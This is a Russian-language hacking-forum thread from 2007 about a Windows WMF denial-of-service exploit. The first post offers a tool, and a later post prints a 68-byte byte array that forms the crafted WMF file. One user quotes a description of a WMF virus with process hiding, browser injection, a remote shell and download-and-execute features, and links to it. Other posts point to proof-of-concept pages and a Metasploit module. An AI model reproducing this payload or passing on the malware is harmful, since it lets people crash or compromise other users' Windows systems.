Сейчас на форуме: bartolomeo, NIKOLA, vasilevradislav, site-pro (+6 невидимых)

 eXeL@B —› Софт, инструменты —› MS WMF DoS v0.2 public
Посл.ответ Сообщение

Ранг: 221.3 (наставник), 135thx
Активность: 0.190.07
Статус: Участник

Создано: 18 января 2007 10:43
· Личное сообщение · #1

Решил заюзать баг найденый Orbital'ом.
Прога генерирует специальный файл с расширением *.wmf,
если попробовать просмотреть папку с данным файлом, то
експлорер вылетает в ...
Написана в Delphi на чистом API.



fa9e_18.01.2007_CRACKLAB.rU.tgz - win_exploit.exe

-----
xchg dword [eax], eax





Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 18 января 2007 10:58
· Личное сообщение · #2

Ну и кому оно надо то?
Понимаю еслиб выполнить код смог бы, а так в топку. На перле лучше и нагляднее.
www.securitylab.ru/poc/extra/286847.php

А еще лучше вот это
www.securitylab.ru/vulnerability/243581.php

-----
Computer Security Laboratory




Ранг: 172.2 (ветеран)
Активность: 0.070
Статус: Участник

Создано: 18 января 2007 11:00 · Поправил: ProTeuS
· Личное сообщение · #3

баян и без сорсов

>>Несложный WMF-вирус, который инфектит графические файлы разных форматов кодом, который используя WMF-уязвимость распаковывает и запускает свой бинарник. Использованы некоторые стелс-механизмы: инжект в дефолтный браузер, скрытие процесса, путём патчинга двусвязного списка EPROCESS. После запуска вирус биндит порт законнектившись на который можно отдать комманду на скачивание и запуск произвольного файла, или запстить remote-shell. Для усложнения жизни евристическим анализаторам, API-ф-ции импортируются и вызываются по хэшу.

http://allmyhate.host.sk/xwmf_.rar http://allmyhate.host.sk/xwmf_.rar

-----
HOW MUCH BLOOD WOULD YOU SHED TO STAY ALIVE




Ранг: 221.3 (наставник), 135thx
Активность: 0.190.07
Статус: Участник

Создано: 18 января 2007 11:09
· Личное сообщение · #4

To [HEX]:
Sorry, на секлабе я этот перловый скрипт не видел!
Шелкод намного больше моего.

To ProTeuS:
держи код, что с ним делать думаю догадаешся

shellcode: array[0..67] of byte = (
$01, $00, $09, $00, $00, $03, $22, $00, $00, $00, $63, $79, $61, $6E, $69, $64,
$2D, $45, $07, $00, $00, $00, $FC, $02, $00, $00, $00, $00, $00, $00, $00, $00,
$08, $00, $00, $00, $FA, $02, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$07, $00, $00, $00, $FC, $02, $08, $00, $00, $00, $00, $00, $00, $80, $03, $00,
$00, $00, $00, $00);

-----
xchg dword [eax], eax




Ранг: 172.2 (ветеран)
Активность: 0.070
Статус: Участник

Создано: 18 января 2007 11:18
· Личное сообщение · #5

это НЕ шеллкод, т.к. полезной нагрузки в DoS быть НЕ может

-----
HOW MUCH BLOOD WOULD YOU SHED TO STAY ALIVE




Ранг: 221.3 (наставник), 135thx
Активность: 0.190.07
Статус: Участник

Создано: 18 января 2007 11:23
· Личное сообщение · #6

Если ты заметил, то shellcode - это имя массива.

-----
xchg dword [eax], eax




Ранг: 172.2 (ветеран)
Активность: 0.070
Статус: Участник

Создано: 18 января 2007 11:27
· Личное сообщение · #7

www.securitylab.ru/poc/extra/286847.php
>>Шелкод намного больше моего

и тут тоже?

-----
HOW MUCH BLOOD WOULD YOU SHED TO STAY ALIVE




Ранг: 172.2 (ветеран)
Активность: 0.070
Статус: Участник

Создано: 18 января 2007 11:27
· Личное сообщение · #8

ладн, кому было нуЖно, все полезное с топика уже по4ерпнули

-----
HOW MUCH BLOOD WOULD YOU SHED TO STAY ALIVE




Ранг: 221.3 (наставник), 135thx
Активность: 0.190.07
Статус: Участник

Создано: 18 января 2007 11:32
· Личное сообщение · #9

Шеллкод потом замучу, щас пока другим занят.

-----
xchg dword [eax], eax





Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 18 января 2007 14:42
· Личное сообщение · #10

v0id2k
Че мутить то когда и так уже все замучено

ссыль на метасплойтовский модуль был дан. юзай кому надо.

-----
Computer Security Laboratory




Ранг: 221.3 (наставник), 135thx
Активность: 0.190.07
Статус: Участник

Создано: 18 января 2007 23:37
· Личное сообщение · #11

[HEX]
Я хочу на Делфях это дело написать.

-----
xchg dword [eax], eax





Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 19 января 2007 05:19
· Личное сообщение · #12

и будешь ты юзать только под виндой эту бодягу! Уж лучше писать на кросплотформенных языках.

-----
Computer Security Laboratory




Ранг: 221.3 (наставник), 135thx
Активность: 0.190.07
Статус: Участник

Создано: 20 января 2007 09:05
· Личное сообщение · #13

To [HEX]
Ты прав, хотя я это писал не для широких масс, а так, для себя.

-----
xchg dword [eax], eax




Ранг: 15.0 (новичок)
Активность: 0.010
Статус: Участник

Создано: 20 января 2007 09:34
· Личное сообщение · #14

v0id2k пишет:
Ты прав, хотя я это писал не для широких масс, а так, для себя.

Отлично, будет код на Delphi, дай сорсы, буду благодарен.




Ранг: 2014.5 (!!!!), 1278thx
Активность: 1.340.25
Статус: Модератор
retired

Создано: 20 января 2007 09:38
· Личное сообщение · #15

Тему предлагаю закрыть, вопросов тут, вроде, никаких нет. Уязвимость сама по себе уже древнющая да и выложены уже файлы, флуд только идёт.


 eXeL@B —› Софт, инструменты —› MS WMF DoS v0.2 public
Эта тема закрыта. Ответы больше не принимаются.
   Для печати Для печати